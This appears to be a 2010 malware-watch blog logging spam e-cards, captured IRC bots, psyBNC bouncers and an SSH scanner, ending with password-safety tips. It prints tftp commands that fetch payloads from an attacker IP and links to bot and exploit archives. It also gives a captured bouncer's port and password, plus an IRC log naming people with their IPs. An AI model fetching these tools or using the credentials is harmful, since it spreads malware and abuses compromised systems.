dinsdag 9 februari 2010

You can say that it's the time of the year. Valentine spam!

As you can see we have received 2 emails with funny links in it. These 2 files are self executables. So look out when you open them! Else you would be infect. So first open winrar and then open the exe file. Inside the file you will find a modified mirc client with some mirc script commands connect, yes again, to undernet.

You have recieved a Hallmark E-Card.
To see it, click *here* , hXXp://xenonshow.gr/hallmark-card.exe

There's something special about that E-Card feeling. We invite you to make a
friend's day and *send one* . hXXp://xenonshow.gr/hallmark-card.exe

donderdag 4 februari 2010

mechbot madness

Would you look at that. Capture a psybnc and yet again a new mechbot. All connected, again, to undernet channel #plecat

Want to use the psybnc? then just connect to port 5544 (passwd is Czech). So you can see where this guy is connected too.

22:00 -!- #plecat corsa H@ 3 corsa@corsa.dk.cx [*!*@corsa.users.undernet.org]
22:00 -!- #plecat nSCLb H@ 3 ~Debian@ns.clb.enforta.com [Debian]
22:00 -!- #plecat Czech_ H@ 3 ~f@mail.rosepathroses.com [Sorin aka Czech]
22:00 -!- #plecat cz3ch_ H@ 3 ~czech@mail.rosepathroses.com [czech]
22:00 -!- #plecat IdTech H@ 3 ~id@ns.clb.enforta.com [Tech]
22:00 -!- #plecat cz3ch H@ 3 ~Debian@41.220.237.50 [Debian]
22:00 -!- #plecat _Sorinake H@ 3 ~Sorinel@ns.clb.enforta.com [Sorinel]
22:00 -!- #plecat Solutions H@ 3 ~Solutions@94.25.80.147 [Solutions]
22:00 -!- #plecat AntiDrog H@ 3 ~dpir@75-146-195-225-Philadelphia.hfc.comcastbusiness.net [Departamentul De Interventie Rapida]
22:00 -!- #plecat LnXTrades H@ 3 ~Alice@75-146-195-225-Philadelphia.hfc.comcastbusiness.net [Curva De Meserie]
22:00 -!- #plecat Stropinika H@ 3 ~ropotan@75.146.195.225 [Memory Brown here comes the summer son ...]
22:00 -!- #plecat Csazar H@x 3 Csazar@Eset.users.undernet.org [Csazar.international]
22:00 -!- #plecat CheckSpam H@ 3 Helper@powered.by.ircd.im [Helper #GigaHosT]
22:00 -!- #plecat |Visul H@ 3 ~Dreams@130.191.5.235 [Visez Frumos]
22:00 -!- #plecat Sorika H@ 3 ~Sorika@130.191.5.235 [Sorika]
22:00 -!- #plecat Czech H@ 3 ~Czech@130.191.5.235 [CehuL Din Cehia]
22:00 -!- #plecat twitter H@ 3 ak47@website.bsd.im [twitter.de]
22:00 -!- #plecat Soryka H@ 3 ~Sorinel@41.220.237.50 [Sorinel]
22:00 -!- #plecat Registru H@ 3 ~Registru@94.25.80.147 [Marca Inregistrata]
22:00 -!- #plecat dulcica3 H@ 3 ~dulce@94.25.80.147 [A Dracu Acritura]
22:00 -!- #plecat Dea H@dx 3 ~Damian@OkyOky.users.undernet.org [Dominika]
22:00 -!- #plecat Diav0litza H@ 3 ~Diav0litz@41.220.237.50 [Hey Pysy ...]

URL:
arhive.ucoz.net/allmech.tgz 
http://vladutz.110mb.com/trades/psyro.tgz.gz

donderdag 28 januari 2010

Oh no more tool!

Hi,

Found some tools beeing used om my machine. So lets share!


http://www.brotacel.007sites.com/shell.txt (mechbot)
http://www.members.lycos.co.uk/adralex/slutBot.tgz(mechbot)
http://npchk.110mb.com/redone.log (psybnc)
http://spdu.us/2009.tgz (wunderbar emporium2 exploit)
http://gabanu.home.ro/redone.log (psybnc)


And you can chat with the guys that posted the mechbots at undernet channel #can, #Adralex and #made



woensdag 27 januari 2010

Hello, who is there?

Omg guys! hacking a system and using the tftp command. Thats so oldskool!

tftp -i 74.214.47.11 get svchost.exe wins\\SVCHOST.EXE
tftp -i 74.214.47.11 get dllhost.exe wins\\DLLHOST.EXE

But lets see what you guys are going to execute.

As far as I can see you guys have some nice irc's there

mindleak.com
0xff.memzero.info
0x80.online-software.org
0x80.goingformars.com
0x80.martiansong.com
0x80.my1x1.com

And look at that trying to steal all my passwords and sniff my keyboard and put them in a file called pstorec.dll. So if you lost your passwords you just scan your computer for pstorec.dll


Look at that a blast from the past. These guys are actually using some old code


mssqludp.c
mssql2000.c
mssql.c
veritas.c
lsass135.c
lsass445.c
rpc445.c
rpc135.c
dcom445.c
dcom135.c
Like I ever use a non updated windows XP or a 2K machine.



If you ever want to see a old bot irc you should check this one out!

/server 194.109.11.65 6556

channel: #9#, #raw #exploit


dinsdag 26 januari 2010

New toy's

Just found some new toys to play with. A ssh scanner and a Mechbot. This guy even made a nice script for it. Almost untraceable ... not ... You can find the unixbots on undernet, channel #can.
#ReMuSeR - Private Version
[+] Exemplu : ./start channel

http://kilix.clan.su/ssh.tgz (sshscaner)
http://remuser.host.sk/linux.jpg (unrar/zip/tar it)

maandag 25 januari 2010

Think your password is secure?

Nope, it doesnt matter if you have ukd718qmq or 12phpgopr even have 1hxtq65e as a password. There are always people out there, trying to infect your computer with a virus and sending your password to them.

A few tips to be secure.

1. Don't accept files from friends that contains a .pif, jpg, gif, bmp or .exe.
2. Make sure you dubble check it before opening files
3. Use a virusscanner or send it to http://www.virustotal.com
4. Change your password often. Especially for banking, paypal accounts etc.
5. Check the website at http://www.siteadvisor.com/
6. Firefox users use noscript addon. (I know it could be a pain in the ass. But scammers like to infect you through advertisement
7. Update your software often
8. Use linux mint/ubuntu
9. Do you have a nephew/uncle/neighbour who says to know lots of computers? They rarely are professionals and know very little of security....
10. Unplug the internet and life in a forrest. Be one with nature!

I wonder

If the feds know about crimeirc.net channel #ccpower.

crimeirc.net Estimated Worth $1408.9 USD